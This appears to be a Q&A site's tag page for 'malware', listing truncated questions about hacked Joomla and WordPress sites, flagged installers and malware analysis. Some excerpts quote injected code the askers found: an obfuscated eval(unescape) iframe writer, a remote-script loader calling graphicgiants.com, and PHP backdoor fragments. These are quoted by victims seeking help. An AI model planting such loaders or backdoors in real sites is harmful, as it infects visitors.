Tagged Questions
The malware tag has no wiki summary.
33
votes
8answers
2k views
How does this mess work?
My Joomla! website has been repeatedly hacked into. Someone, somehow, managed to inject the following rubbish into the key php scripts, but I mean not to talk about configuring Joomla. The site is not ...
7
votes
4answers
816 views
Ways to make Javascript code hacking / injection / manipulation difficult?
Are there ways to prevent, or make it difficult enough, for someone to inject Javascript and manipulate the variables or access functions? A thought I had is to change all var names randomly on each ...
5
votes
10answers
858 views
My Application's Auto-update utility is triggering Anti-Virus
I've created an auto-updating application which is distributed to 100s of users.
The auto-update utility is being flagged by 55% of antiviruses on virustotal ( link ).
My application was created in ...
4
votes
2answers
220 views
Are there any tools to sandbox a malware application even more than the granted permissions on Android?
Suppose I want to run some program which requests too many permissions. For example, record from the microphone or read IMEI of my phone. However, there are no practical explanation why recording from ...
4
votes
5answers
181 views
Malware on a client's website - Ideas?
We recently got a call from one of our clients, complaining that their site has some "strange looking code" at the bottom of the page. We checked out the source code, and discovered that about 800 ...
4
votes
1answer
78 views
How to approach whitelisting an app/exe
We have an application that auto-installs upgrades of itself on our customers' (Windows OS/PCs) computers. It is lightweight (650K) and does a very specific task for our customers in helping us ...
3
votes
5answers
378 views
malware attack in my site (injecting a javascript and php code)
I have done various projects using Joomla CMS. From the last two weeks I am facing a serious problem with my new projects. It looks like a malware attack. As you know joomla CMS put always blank html ...
3
votes
1answer
93 views
Eclipse listens on port 42540 (?)
I just appalledly realized my Eclipse IDE listens on port 42540. During the past weeks I installed some more or less useful plug-ins (and removed some of them). Maybe one of them listens on this port, ...
3
votes
3answers
156 views
Determining if a Java app is malware
I am curious about what automatic methods may be used to determine if a Java app running on a Windows or PC is malware. (I don't really even know what exploits are available to such an app. Is there ...
3
votes
1answer
89 views
What to do when the application I wrote (its setup file) is flagged as virus/trojan?
I wrote a download manager (in the AutoHotKey language) for a client and it gets flagged by a minority of virus scanners (11% of the scanners used on VirusTotal) as being a trojan, malware, dropper, ...
3
votes
1answer
98 views
What's the best service to use for filtering out spam/abuse/malware links for a link shortening webapp?
I have two services - Lincr and LinkBunch. Lincr is a plain jane URL shortening service, while LinkBunch lets you shorten multiple links into one link. I've had too much spam posted into the services, ...
3
votes
9answers
344 views
This site may be distributing malware ? strange javascript?
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
...
3
votes
2answers
688 views
how to get the google list of dangerous sites
I need to check the url against Google list of dangerous sites, how I do that for windows application ?
I will use Delphi.
thanks
3
votes
2answers
469 views
Hash-database of malware and such?
Is there any free database of hashes of malware? I'd like to get a real database of those hashes, so is there any place where this is possible to collect data?
I've found ...
3
votes
3answers
206 views
How Big a Security Risk are Browser Extensions?
One of the more powerful features of modern day browsers is the ability for software developers to write browser extensions to enhance, modify and tweak the pages visited by the user. As more of our ...
2
votes
3answers
77 views
is there any option to run and remove virus (spyware trojan malware ) in linux? [closed]
By title,This question may be crazy..
Still I am using linux (fedora 16) at my laptop and another my friend using windows 7.
We use share files using USB. so would like to check with you guys ...
2
votes
1answer
54 views
Finding a specific Window using its title hashed value
I've been decompiling a piece of code I believe is malware and I'm trying to figure out what it does. It searches for a specific window title and uses the name of that window to decode the rest of its ...
2
votes
2answers
123 views
Where to get Malware for analyzing malware?
I want to reverse engineer malware for analysis. Is there a database or forum that has malware that is available for download?
2
votes
2answers
1k views
Unable to understand this script [closed]
I have this JavaScript
(a = (b = document).createElement("script")).src =
"//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)
But I'm unable to see the source of: ...
2
votes
4answers
165 views
What this piece of javascript do? It looks malware
Anyone can decode that? I tried all my js foo, looked on jsunpack and can't figure it out. A site that got blacklisted had that, so I think that's the culprit.
<script type="text/javascript">
...
2
votes
2answers
196 views
regex question for removal of javascript malware
Been hit with some nasty javascript malware on my site. I know that each offending code block starts with the following:
<script language=javascript><!--
(function()
and ends with
...
2
votes
2answers
126 views
virus problem in home page
i have recently maked a site which if i open that in chrome it gives me a malware protection error and if i open it in ff or ie it gives me to install Java plugin, but i haven't add any java applet to ...
2
votes
2answers
145 views
Url filtering
I'm looking for way to verify whether a site is categorized in any url filtering databases.
Does somebody know such database with free API?
2
votes
4answers
1k views
Strange elements appearing in javascript rich text editors
There's been a rash of strange HTML form elements showing up in javascript-based rich text editors all around the web. The first evidence I can find of this is in the joomla forums a little under a ...
1
vote
1answer
30 views
PHP: detect which script is calling header();
I'm trying to find a malware that's causing a redirect on a website. Most probably it's using header("location: ...") so i'm wondering is there a way to determine which script file is calling the ...
1
vote
5answers
109 views
hacked website unusual php file
I have a file called q.php that has appeared in one of my websites. The site has been hacked. does anyone know what the file does?
<? error_reporting(0); if(@$_GET['wpth']){ echo ...
1
vote
2answers
166 views
“Failed to load Main-Class manifest attribute from client.jar” in a possible malware .jar file?
I found a Client.jar file on a customer's computer, containing two .class files which I could decompile to this two files:
Client.java
I.java
Moreover there's a I.gif which is obviously no GIF ...
1
vote
3answers
215 views
JavaScript code injected into site: Can you help me decrypt it?
Recently I was the victim of a web attack, which seemed to take various PHP server vars, then forward them to an attackers website. (IPs of visitor/website, referrer, useragent etc, etc.) Then it ...
1
vote
3answers
139 views
About Removing Malware Scripts
I am working on a php website and it gets regularly infected by Malware. I've gone through all the security steps but failed. But I know how it every time infect my code. It comes at the starting of ...
1
vote
3answers
113 views
Code to search for a specific code any file in a directory and sub directory
Ok I am pretty new to php but I know it can read directorys and files.
I have been struggling with malware problem on one of our sites and I need to write a script to search for it on my host space.
...
1
vote
3answers
290 views
1
vote
1answer
368 views
AppCertDlls: Process creation slowdown on Win32 caused by virus
I've been enjoying a hefty process creation penalty on my Windows XP Home SP3 for about two months. The problem is most manifest and annoying with tasks that do create lots of processes, such as shell ...
1
vote
1answer
674 views
DJango Dev Server strange output ppcfinder.net/judge.php
I wonder if anyone has seen this. I am developing a web app and the dev server just output the following when I was doing some testing.
logging on
[21/Oct/2010 13:42:56] "POST /members/logon/ ...
1
vote
1answer
116 views
How can i use safe-browsing application object to determine whether a url is reported as phishing site or malware site?
Here is code snippet:
Components.classes['@mozilla.org/safebrowsing/application;1']
.getService().wrappedJSObject.malwareWarden.listManager_
.safeLookup(test_url, function(tableName){
...
1
vote
2answers
155 views
What is this? Google analytics cookie or malware?
I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:
var ...
1
vote
1answer
76 views
Hypervisors: is arbitrary code execution on the guest possible?
I've been reading into virtualization security and came across Blue Pill, a malicious thin hypervisor (project website is down, archived version here: ...
1
vote
1answer
326 views
Documentation on Virt-ICE other than white paper
I am trying to find information on Virt-ICE, a malware debugger/analysis tool presented at the most recent Black Hat conference. I have read through the white paper Virt-ICE: Next-generation Debugger ...
1
vote
10answers
418 views
All PHP files getting hacked
Like always, just want to say thank you for all of the help and input in advance.
I have a particular site that I am the web developer for and am running into a unique problem. It seems that somehow ...
1
vote
2answers
802 views
Can anyone de-obfuscate this exploit?
I came across the following exploit due to a warning from my AV software. It originated from an adserver delivering banner ads on one of my sites.
I have retrieved the content with Wget and copied to ...
1
vote
2answers
406 views
how to get rid of b9g.ru iframe injected on to a website
I have done a website whose URL is http://www.netbramha.com
Unfortunately after the end of each page, i have the following piece getting added
<iframe src="" width=186 height=182 ...
1
vote
2answers
253 views
What are good programming practices to prevent malware in standalone applications?
Does anyone have any thoughts on how to prevent malware attacks on standalone applications. Let's say this is a program on a Windows machine connected to the internet, this is the most common ...
0
votes
1answer
17 views
debugging newly created remote thread
Im analyzing a particular malware sample and it seems to be doing the following in order to get write into the process memory of explorer.exe and execute code :-
OpenProcess(on explorer.exe)
...
0
votes
0answers
38 views
Localhost WAMP server slowdown
My local WAMP server experiences major slowdowns when connected to the internet. I'm talking page refresh time from <1 second to over 20 seconds. If I disconnect my ethernet cable I experience huge ...
0
votes
1answer
78 views
Trying to recover sites from a .htaccess redirect badware on Wordpress
Forgive me if this is a noob question, but I'm honestly stumped.
My site, hosted on Wordpress, has been blacklisted because of some badware. So far, I've tried unmaskparasites.com, google webmaster ...
0
votes
1answer
76 views
Dynamic malware analysis
I am new to malware analysis and I have following questions regarding dynamic malware analysis:
How to solve multiple path problem in dynamic analysis(any tools available)?
what else I need to ...
0
votes
1answer
146 views
msvcp60.dll imported function names on idapro and ollydbg
I am currently reversing a code that imports some functions from msvcp60.dll when I open the code on IDApro the function names are very long and doesn't give any hint about what are they doing. and ...
0
votes
1answer
497 views
malware-work with google bot [closed]
this is a malware that lives on my sites, its very bad ,
<?php
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
...
0
votes
1answer
411 views
My website contains malware
Warning: Something's Not Right Here!
www.mywebsite.com contains malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your ...
0
votes
2answers
80 views
Is controlling windows not owned by your process considered a malware activity?
I am planning to follow one of the suggestions made here to control window dimensions, hide/show and bring to front of a window owned by a different process from my process.
Window manipulation using ...
0
votes
0answers
96 views
“cms.ad.yieldmanager” what is this? [closed]
In fiddler, I see so many requests issued for resources at "cms.ad.yieldmanager.net" on the page load. There is no reference to it in the code. How can I stop these requests?
Any help appreciated. ...